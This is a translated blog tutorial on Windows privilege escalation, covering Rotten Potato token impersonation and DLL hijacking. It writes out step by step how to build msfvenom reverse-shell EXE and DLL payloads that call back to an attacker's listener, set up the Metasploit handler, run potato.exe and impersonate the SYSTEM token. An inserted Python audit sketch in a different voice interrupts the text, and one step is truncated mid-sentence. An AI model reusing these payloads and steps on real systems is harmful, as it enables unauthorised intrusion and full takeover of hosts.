Escalation of Privilege: Rotten Potatoes || DLL Hijacking.


Privilege escalation (提权) means raising the level of access one holds. Because the operating system is a multi-user system, users are subject to permission controls. For example, the permissions obtained through a web vulnerability are those of the web process, and web services are often started under an account with very low privileges. Some operations through the webshell are therefore restricted, which is why the access needs to be elevated to administrator or even SYSTEM privileges. Privileges are usually escalated through operating system vulnerabilities or misconfigurations, or through third-party software services such as database or FTP software vulnerabilities.


Table of contents:

Elevation of Privilege: Rotten Potatoes || DLL Hijacking.

Privilege escalation approach:

Principle of RottenPotato (Rotten Potato) privilege escalation:

Principle of DLL hijacking privilege escalation:

Elevation of Privilege: Rotten Potatoes

Step 1: Generate a backdoor program (Trojan horse).

Step 2: Upload the newly generated program to the server to be elevated.

Step 3: Install msf directly on our server.

Step 4: Execute the program on the Windows operating system and connect back to our server (kali).

Step 5: If token stealing alone does not work and we still only have IIS permissions, upload Rotten Potato.

Escalation of Privilege: DLL Hijacking

Step 1: Information collection (find out whether third-party software is installed).

Step 2: Install the same software ourselves, then use Huorong Sword (火绒剑) to analyze the process.

Step 3: Generate a backdoor DLL file.

Step 4: Place the generated DLL file in the same directory as the process, and rename the original file.

Step 5: Install msf directly on our server.

Step 6: When the third-party software is opened, it will enter the .

Step 7: Use token stealing techniques to escalate privileges.


Disclaimer:

It is strictly forbidden to use the technology mentioned in this article to carry out illegal attacks, otherwise the consequences will be at your own risk, and the uploader will not bear any responsibility.


Privilege escalation approach:

Principle of RottenPotato (Rotten Potato) privilege escalation:

(1) Trick the "NT AUTHORITY\SYSTEM" account into authenticating via NTLM to a TCP endpoint we control.

(2) Perform a man-in-the-middle attack (NTLM relay) on this authentication process and locally negotiate a security token for the "NT AUTHORITY\SYSTEM" account. This is done through a series of Windows API calls.

(3) Impersonate this token. Only accounts holding the "impersonate security token" privilege can impersonate another account's token. Most service accounts (IIS, MSSQL, etc.) have this privilege; most user-level accounts do not.

So the webshell obtained from the web generally runs with IIS server permissions, which do have this impersonation privilege. During testing, I found that when I used an already created account (the user-level account mentioned above) to get a reverse meterpreter and then ran the EXP, it failed, but getting a reverse meterpreter through Chopper (菜刀, IIS server permissions) succeeded. Non-service user accounts cannot steal the token successfully (this is the principle).

Operation process: upload Rotten Potato - execute Rotten Potato - use the token-stealing module - steal SYSTEM - success

Principle of DLL hijacking privilege escalation:

A Windows program needs DLLs when it starts. If one of these DLLs does not exist, privileges can be escalated by placing a malicious DLL in a location where the application will look for it. Windows applications normally have a predefined path for locating DLLs, searched in the following order:

1. The directory the application was loaded from

2. C:\Windows\System32

3. C:\Windows\System

4. C:\Windows

5. The current working directory (CWD)

6. The directories in the PATH environment variable (system PATH first, then user PATH)

Operation process: information collection (third-party software) -- process debugging -- build the DLL and upload it -- replace the DLL -- success once the application starts
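The search order above is what an auditor has to reason about when checking whether an installed program is exposed: for each DLL name the process asks for, which directory wins, and is that directory writable by low-privilege users? The following is an added example, not code from the original post: a small model of that search order that classifies a DLL as resolved from a protected directory, resolved from a writable directory, or absent everywhere (in which case the first writable directory in the order is the ACL that needs fixing). The directory contents, writable set and DLL names are constructed for the demonstration.

```python
import ntpath

WINDIR = r"C:\Windows"

def search_order(app_dir, cwd, path_dirs, windir=WINDIR):
    """Search order as listed on the page (the order used when SafeDllSearchMode
    is enabled). Real Windows additionally serves KnownDLLs straight from
    System32 and honours application manifests before falling back to this list."""
    return [app_dir, ntpath.join(windir, "System32"), ntpath.join(windir, "System"),
            windir, cwd, *path_dirs]

def resolve_dll(dll_name, order, present):
    """First directory in the order that actually contains dll_name, else None."""
    wanted = ntpath.normcase(dll_name)
    for d in order:
        if wanted in {ntpath.normcase(f) for f in present.get(ntpath.normcase(d), ())}:
            return d
    return None

def audit_dll(dll_name, order, present, writable):
    """'ok' if resolved from a protected directory; 'hijackable' if the winning
    directory is writable by low-privilege users; 'missing' if no copy exists,
    in which case the first writable directory in the order is the ACL to fix."""
    loc = resolve_dll(dll_name, order, present)
    if loc is None:
        first_writable = next((d for d in order if ntpath.normcase(d) in writable), None)
        return ("missing", first_writable)
    if ntpath.normcase(loc) in writable:
        return ("hijackable", loc)
    return ("ok", loc)

# Constructed host state: a third-party app installed into a world-writable folder.
APP_DIR = r"C:\Program Files\ThirdParty"
CWD = r"C:\Users\bob\Downloads"
PATH_DIRS = [ntpath.join(WINDIR, "System32"), r"C:\Tools"]
ORDER = search_order(APP_DIR, CWD, PATH_DIRS)
PRESENT = {  # directory -> files on disk (constructed listing)
    ntpath.normcase(APP_DIR): ["app.exe", "plugin.dll"],
    ntpath.normcase(ntpath.join(WINDIR, "System32")): ["kernel32.dll", "version.dll"],
}
WRITABLE = {ntpath.normcase(d) for d in (APP_DIR, CWD, r"C:\Tools")}

if __name__ == "__main__":
    for name in ("version.dll", "plugin.dll", "missing.dll"):
        print(name, audit_dll(name, ORDER, PRESENT, WRITABLE))
```

On a real host the same functions would be fed by the process's imported DLL names (as seen in a process analysis tool) and by the ACLs of each directory in the order.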

Elevation of Privilege: Rotten Potatoes

Step 1: Generate a backdoor program (Trojan horse).

Backdoor program (Trojan): https://tianyuk.blog.csdn.net/article/details/123541093

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105 lport=4444 -f exe > bgxg.exe

// lhost = the IP address of kali
// lport = the port number (for example 4444)
// -f exe > filename.exe


Step 2: Upload the newly generated program to the server to be elevated.


Step 3: Install msf directly on our server. (I have msf in kali directly for testing here.) (The two servers must be able to communicate.)

msfconsole            // open msf

use exploit/multi/handler        // load the module

set payload windows/meterpreter/reverse_tcp
// payload command (the windows/meterpreter/reverse_tcp set here must match the program)

set lhost 192.168.0.105
// set the local listening IP (kali's IP) (the IP set here must match the program)

set LPORT 4444
// set the local listening port (kali's port) (the port set here must match the program)

run                // execute


Step 4: Execute the program on the Windows operating system and connect back to our server (kali).


Step 5: If token stealing alone does not work and we still only have IIS permissions, upload Rotten Potato.

Rotten Potato download: windows-kernel-exploits/MS16-075 at master · SecWiki/windows-kernel-exploits · GitHub

getuid         // check the current privileges (only use the following if it is IIS)

pwd            // show the current directory

cd C://        // change to the Rotten Potato directory

execute -cH -f ./potato.exe        // run Rotten Potato

use incognito        // token-stealing module

list_tokens -u       // list the tokens that can be stolen

impersonate_token "NT AUTHORITY\SYSTEM"    // steal the token


Escalation of Privilege: DLL Hijacking

Step 1: Information collection (find out whether third-party software is installed).


Step 2: Install the same third-party software ourselves, then use Huorong Sword (火绒剑) to analyze the third-party software's process.


Step 3: Generate a backdoor DLL file.

msfvenom -p windows/meterpreter/reverse_tcp lhost=(kali's IP address) lport=(port) -f dll > (same filename as the process's DLL).dll


Step 4: Place the generated DLL file in the same directory as the process, and rename the original file.


Step 5: Install msf directly on our server. (I have msf in kali directly for testing here.) (The two servers must be able to communicate.)

msfconsole            // open msf

use exploit/multi/handler        // load the module

set payload windows/meterpreter/reverse_tcp
// payload command (the windows/meterpreter/reverse_tcp set here must match the program)

set lhost 192.168.0.105
// set the local listening IP (kali's IP) (the IP set here must match the program)

set LPORT 4444
// set the local listening port (kali's port) (the port set here must match the program)

run                // execute


Step 6: When the third-party software is opened, it will enter the .


Step 7: Use token stealing techniques to escalate privileges.

getuid        // check the current privileges

use incognito        // token-stealing module

list_tokens -u       // list the tokens that can be stolen

impersonate_token "NT AUTHORITY\SYSTEM"    // steal the token


Learning link: Day 62: Privilege Escalation - Rotten Potatoes & DLL Hijacking & Quoted Paths & Service Permissions_哔哩哔哩_bilibili


Source: blog.csdn.net/weixin_54977781/article/details/130456730